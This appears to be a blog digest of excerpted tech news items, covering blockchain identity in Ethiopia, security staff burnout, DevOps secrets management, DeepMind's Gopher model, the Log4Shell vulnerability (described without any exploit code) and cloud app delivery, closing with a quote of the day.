Why a Little-Known Blockchain-Based Identity Project in Ethiopia Should Concern Us All
We have countless examples of the dangers of national ID schemes in general,
including from Kenya, Uganda, Pakistan, India and elsewhere. But while national
ID schemes can be highly problematic, building them on blockchain could be
catastrophic. Putting aside the very obvious logistical hurdles, including very
low internet penetration rates in Ethiopia (that are significantly lower in more
rural regions) and the displacement of children from schools due to ongoing
conflict and humanitarian challenges, there are much deeper problems with
Hoskinson’s plans. Blockchain is fundamentally an accounting technology designed
to track and trace digital assets through an immutable ledger of transactions.
Blockchain-based ID schemes similarly treat identity as a transactional,
mathematical problem. The more transactions, the more profitable for the
network. There are also serious privacy and data protection concerns with the
logging of all this metadata. While proponents of blockchain-based ID claim that
concerns are unfounded if the system is designed correctly and identity
documents are kept off ledger, the dangers of metadata in this
context are well-documented.
Everyone is burned out. That's becoming a security nightmare
In many organisations, it's cybersecurity staff who are there to counter
activity that could make the network vulnerable to cyberattacks – but according
to the paper, cybersecurity professionals are more burned out than other
workers. The research suggests that 84% of security professionals are feeling
burned out, compared with 80% of other workers. And when cybersecurity employees
are burned out, they're more than likely to describe themselves as "completely
checked out" and "doing the bare minimum at work" – something that one in 10
cybersecurity professionals described as their state of mind compared with one
in 20 of other employees. That attitude could easily result in security threats
being missed or flaws not being fixed in time, something that could put the
whole company at risk from cyber incidents. "Pandemic-fueled burnout – and
resultant workplace apathy and distraction – has emerged as the next significant
security risk," said Jeff Shiner, chief executive officer at 1Password. "It's
particularly surprising to find that burned-out security leaders, charged with
protecting businesses, are doing a far worse job of following security
guidelines – and putting companies at risk".
How Can We Get Blockchains to Talk to Each Other?
Solving this problem is a booming area of research though, and last month
Schulte and his colleagues presented a potential workaround at the IEEE
International Conference on Blockchain Computing and Applications. Their
approach relies on blockchain relays, which are essentially smart contracts
running on one blockchain that can verify events on another blockchain. If a
user wants to transfer an asset they first destroy, or “burn,” it on the
source blockchain, which is typically done by sending the asset to a user
address that doesn’t exist. This transaction also includes details of the
asset and which blockchain and user they want to send it to. Third parties
monitor the source blockchain for these burn transactions and then send them
to the relay for a small reward, which verifies the burn transaction and
recreates the asset on the new blockchain. The challenge, says Schulte, is
that these verification processes invoke transaction fees that can quickly
make the approach impractical. So they created a verification on-demand system
where the relay assumes transactions are valid unless they are
disputed.
DeFi architect Andre Cronje said it’s time to give up on the inaccurate term “decentralized finance”
“We aren’t decentralized, the old guard will keep trying to use it as their
“attack” vector,” he added in a disheartening tone, as he proposed a couple of
alternative coined terms. According to Cronje, “open finance” or “web3
finance” present some better-suited options that would describe the sector
more accurately. Cronje’s unreserved commentary is tough to challenge–thanks
to his vast experience and track record. After launching Yearn in 2020, Andre
made a move that granted him a somewhat legendary status in the crypto
community–he chose to distribute all YFI tokens amongst liquidity providers,
without withholding any for himself, or the Yearn development fund. Some of
Cronje’s recent projects include the decentralized stablecoin exchange
protocol Fixed Forex, and Keep3r Network, which facilitates the interaction
between those looking for external developers and job executors–known as
Keepers. He was also involved in developing Fantom–a highly scalable Layer 1
blockchain.
DevOps Teams Struggling to Keep Secrets
From Carson’s perspective, secrets management is the ability to move away from
hardcoded passwords or static keys to just-in-time privileges or one-time-use
passwords so even when comprised they cannot be used. “Many privileged access
management solutions that protected privileged access for years have extended
functionality to developers to help move the value into DevOps so they can
manage credentials for applications, databases, CI/CD tools and services
without causing friction in the development process,” he said. Approaches like
privileged access security helps enable API-as-a-service and provides instant
availability of secrets, SSH keys, certificates, API keys and tokens. Bambenek
added the problem isn’t choosing a secrets management process or tool, but
rather that they aren’t in place at all. “Pick something that will keep keys
and secrets out of public cloud repositories that developers will use that
allows for quick and easy rotation of keys as the need arises,” he
said.
DeepMind debuts massive language A.I. that approaches human-level reading comprehension
DeepMind’s language model, which it calls Gopher, was significantly more
accurate than these existing ultra-large language models on many tasks,
particularly answering questions about specialized subjects like science and
the humanities, and equal or nearly equal to them in others, such as logical
reasoning and mathematics, according to the data DeepMind published. This was
the case despite the fact that Gopher is smaller than some ultra-large
language software. Gopher has some 280 billion different parameters, or
variables that it can tune. That makes it larger than OpenAI’s GPT-3, which
has 175 billion. But it is smaller than a system that Microsoft and Nivida
collaborated on earlier this year, called Megatron, that has 535 billion, as
well as ones constructed by Google, with 1.6 trillion parameters, and Alibaba,
with 10 trillion. Ultra-large language models have big implications for
business: they have already lead to more fluent chatbots and digital
assistants, more accurate translation software, better search engines, and
programs that can summarize complex documents.
Dangerous “Log4j” security vulnerability affects everything from Apple to Minecraft
This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud
Security Team. Any service that logs user-controlled strings was vulnerable to
the exploit. The logging of user-controlled strings is a common practice by
system administrators in order to spot potential platform abuse, though those
strings should then be “sanitized” — the process of cleaning user input to
ensure that there is nothing harmful to the software being submitted. The
exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE
vulnerability that allows for total system takeover. There’s already a
proof-of-concept exploit online, and it’s ridiculously easy to demonstrate
that it works through the use of DNS logging software. If you remember the
Heartbleed vulnerability from a number of years ago, Log4Shell definitely
gives it a run for its money when it comes to severity. “Similarly to other
high-profile vulnerabilities such as Heartbleed and Shellshock, we believe
there will be an increasing number of vulnerable products discovered in the
weeks to come,” the Randori Attack Team said in their blog today.
It’s time for tech to embrace security by design
Basic cybersecurity hygiene is the key to protecting your devices against the
most common types of malware, but we also need security built into technology
to prevent these sophisticated cyberattacks. The Secret Service is certainly
best known for protecting the president. But its other primary mission is to
safeguard the nation’s financial infrastructure and payment systems to
preserve the integrity of the economy from a wide range of financial and
electronic crimes, including U.S. counterfeit currency, bank and financial
institution fraud, illicit financing operations, identity theft, access device
fraud and cybercrimes. With the prevalence of mobile devices in today’s world,
that means that, as the Department of Homeland Security (DHS) recommends,
“users should avoid — and enterprises should prohibit on their devices —
sideloading of apps and the use of unauthorized app stores.” The pandemic has
been a boon to cybercriminals, taking “advantage of an opportunity to profit
from our dependence on technology to go on an internet crime spree,” said Paul
Abbate, deputy director of the Federal Bureau of Investigation.
Simulating matter on the quantum scale with AI
Although DFT proves a mapping exists, for more than 50 years the exact nature
of this mapping between electron density and interaction energy — the
so-called density functional — has remained unknown and has to be
approximated. Despite the fact that DFT intrinsically involves a level of
approximation, it is the only practical method to study how and why matter
behaves in a certain way at the microscopic level and has therefore become one
of the most widely used techniques in all of science. Over the years,
researchers have proposed many approximations to the exact functional with
varying levels of accuracy. Despite their popularity, all of these
approximations suffer from systematic errors because they fail to capture
certain crucial mathematical properties of the exact functional. By expressing
the functional as a neural network and incorporating these exact properties
into the training data, we learn functionals free from important systematic
errors — resulting in a better description of a broad class of chemical
reactions.
A Paradigm Shift in App Delivery
As the shift to cloud accelerates, organizations are also looking for ways to
reduce risk as they deliver apps over the cloud. “I think recently the
pandemic has made every digital business an experience-delivery company,”
Gupta said. “If you talked about transition to cloud and SaaS a few years
back, everybody was going towards it. But the question now is how fast I can
go, and how confidently while reducing the risk I can achieve with a hyper
transition to the cloud and it’s [creation of] a lot of new opportunities and
challenges.” Another main reason organizations are making the shift to
cloud-based deployments is to benefit from “auto-scaling,” Gupta said. “But
the challenge with auto-scaling is that you have to do a lot of guesswork
about CPU and memory… and if your intent or requirements change, you must go
back to square one and repeat that cycle multiple times,” Gupta said. This is
among the reasons why organizations are increasingly rethinking their
application-delivery approaches. “This is the time to look at your
application-delivery infrastructure and to take a new radical approach to
build a new application delivery and security infrastructure,” Gupta said.
Quote for the day:
"It is time for a new generation of
leadership to cope with new problems and new opportunities for there is a
new world to be won." -- John E Kennedy
No comments:
Post a Comment